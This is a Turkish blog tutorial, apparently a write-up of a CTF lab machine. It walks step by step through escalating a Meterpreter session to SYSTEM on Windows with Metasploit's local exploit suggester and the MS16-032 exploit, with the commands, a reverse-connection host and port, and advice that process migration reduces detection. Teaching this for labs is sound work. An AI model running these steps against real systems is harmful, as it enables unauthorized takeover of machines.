Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. Siber Güvenlik
  4. »
  5. Metasploit ile Windows’ta Yetki Yükseltme (Adım Adım Rehber)

Metasploit ile Windows’ta Yetki Yükseltme (Adım Adım Rehber)

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 6 dk okuma süresi
230 0

Bu yazımızda Metasploit ile Windows’ta Yetki Yükseltme (Adım Adım Rehber) inceleyeceğiz. 

Giriş

Siber güvenlik ve pentest çalışmalarında, düşük ayrıcalıklı bir kullanıcı hesabıyla hedef sisteme erişim sağlamak sadece ilk adımdır. Önemli olan, bu erişimi kullanarak daha yüksek yetkiler elde etmek ve root/administrator kullanıcısı içerisine geçmektir.

Bu yazıda, Metasploit kullanarak bir Windows sisteminde nasıl yetki yükseltebileceğinizi, özellikle MS16-032 Secondary Logon Handle Exploit üzerinden SYSTEM seviyesine nasıl erişim sağlayabileceğinizi ve süreç taşımayı (migration) neden yaptığımızı ele alacağız.

Makine Bilgisi

Adım 1: Metasploit ile Hedef Sistemde Meterpreter Oturumu Oluşturma

Metasploit kullanarak hedef sistemde başarılı bir exploit çalıştırarak Meterpreter oturumu oluşturuyoruz. Bu, normal bir kullanıcı hesabıyla sisteme bağlanmamıza yardımcı olur. Oturum oluşturduktan sonra kullanıcı yetkilerini kontrol etmek için aşağıdaki komutu kullanabilirsiniz:

getuid parametresi ile baktığımızda kostas kullanıcısı içerisinde olduğumu görüyoruz. 

OPTIMUM\kostas

Bu komut, mevcut oturumun hangi kullanıcıyla çalıştığını gösterir. Gördüğünüz gibi, administrator yetkisine ulaşmamız gerekiyor. Şu anda normal bir kullanıcı içerisindeyiz.

Adım 2: Süreçlerin Listelemesi ve Migration Neden Önemlidir?

Meterpreter oturumu başlattığımızda bağlantı genellikle kısa süreli olur. Bu süreçte firewall’lar bağlantıyı tespit edebilir veya bağlantı kopmaları yaşanabilir. Migration işlemi ile oturumu daha kararlı hale getiriyoruz.

Migration Nedir?

Migration, Meterpreter oturumunun bir süreçten başka bir sürece taşınması işlemidir. Bu işlem şu avantajları sağlar:

  • Tespit Edilme Riskini Azaltır: Güvenlik duvarları tarafından tespit edilme olasılığını düşürür.
  • Bağlantı Stabilitesini Artırır: Kesintisiz bağlantı sağlar ve yetki yükseltme işlemini kolaylaştırır.

En kararlı süreçlerden biri explorer.exe‘dir, çünkü Windows sistemlerinde bu işlem her zaman aktiftir.

Süreç Listeleme:

Süreçleri listelemek için aşağıdaki komutu kullanabilirsiniz:

meterpreter > ps 

Metasploit ile Windows'ta Yetki Yükseltme (Adım Adım Rehber)

Çıktıda sistemde çalışan tüm işlemleri göreceksiniz. Hedef süreci (ör. explorer.exe) seçip onun PID’sini (Process ID) kullanarak migration yapabilirsiniz. Örnek:

Migration İşlemi

Migration işlemi için aşağıdaki komutları çalıştırabilirsiniz:

meterpreter > migrate 1332
[*] Migrating from 2496 to 1332…
[*] Migration completed successfully.

Artık oturumunuz explorer.exe sürecine taşındı. Bu işlem bağlantı stabilitesini artırır. 

background yazarak sessionsımızı dinlemeye alıyoruz bekletiyoruz.

Metasploit ile Windows'ta Yetki Yükseltme (Adım Adım Rehber)

Adım 3: Yerel Exploit’leri Araştırma (Local Exploit Suggester Kullanımı)

Hedef sistemde kullanılabilecek yerel exploit’leri keşfetmek için Metasploit’in Local Exploit Suggester modülünü kullanabilirsiniz. Bu modül, sistemde mevcut zafiyetlere göre önerilerde bulunur.

Metasploit’in Local Exploit Suggester modülü ile hedef sistem için uygun olan yerel exploit’leri keşfedebilirsiniz:

  • use post/multi/recon/local_exploit_suggester
  • set session 1
  • run

Bu modül, oturumun çalıştığı sistemde mevcut zafiyetlere karşılık gelen exploit’leri listeler. Çıktıda aşağıdaki gibi yetki yükseltme exploit’lerini görebilirsiniz: 

  • BypassUAC Exploitleri: bypassuac_eventvwr, bypassuac_sdclt, vb.
  • CVE Tabanlı Exploitler: CVE-2019-1458, CVE-2020-0787, CVE-2021-40449, vb.
  • MS16-032 Exploit’i: ms16_032_secondary_logon_handle_privesc

Buradan direkt kendi otomatik olarak sisteme göre exploiti tarıyor. Size kullanabileceğiz exploitleri veriyor.

Adım 4: MS16-032 Exploit ile Windows’ta Yetki Yükseltme

Bu yazıda MS16-032 exploit’ini kullanacağız. Bu exploit, Windows’un “Secondary Logon” hizmetindeki bir güvenlik açığını kullanır ve SYSTEM seviyesinde bir oturum oluşturur. Aşağıda yeşil olan sistemde 10 exploitte kullanılabilir. 

Metasploit ile Windows'ta Yetki Yükseltme (Adım Adım Rehber)

Exploit Seçimi

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

Exploit Ayarlarının Yapılandırılması:

  • set session 1
  • set lhost 10.10.14.2
  • set lport 9001
  • run

Metasploit ile Windows'ta Yetki Yükseltme (Adım Adım Rehber)

Çıktıda, exploit’in başarılı bir şekilde çalıştığını ve Administrator (System) seviyesinde bir oturum oluşturulduğunu göreceksiniz.

Adım 5: Administrator Yetkisini Doğrulama (Metasploit Komutları)

Metasploit ile Windows'ta Yetki Yükseltme (Adım Adım Rehber)

SYSTEM seviyesine ulaşıldığını doğrulamak için şu komut kullanılır:

  • meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Adım 6: SYSTEM Yetkisi ile Çalışma ve Kontrol Sağlama

SYSTEM seviyesine ulaştıktan sonra, hedef sistem üzerinde tam kontrol sahibi oluyoruz.

Bu yazıda, Metasploit ile Windows’ta Yetki Yükseltme (Adım Adım Rehber)  ele aldık. Özellikle MS16-032 exploit’i, Windows 7/8/8.1 ve Server 2008/2012 sistemlerinde hala etkili bir zafiyet olarak öne çıkmaktadır. Migration işleminin meterpreter oturumunun kararlılığını artırmak ve tespit riskini azaltmak için neden önemli olduğunu da gördük.

Uyarı: Bu yöntemler yalnızca yasal ve etik çerçeveler içinde kullanılmalıdır. İzinsiz sistemlere erişim veya exploit çalıştırma ciddi yasal sonuçlara yol açabilir. Bu bilgileri yalnızca eğitim ve CTF gibi yasal ortamlarda kullanın.

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir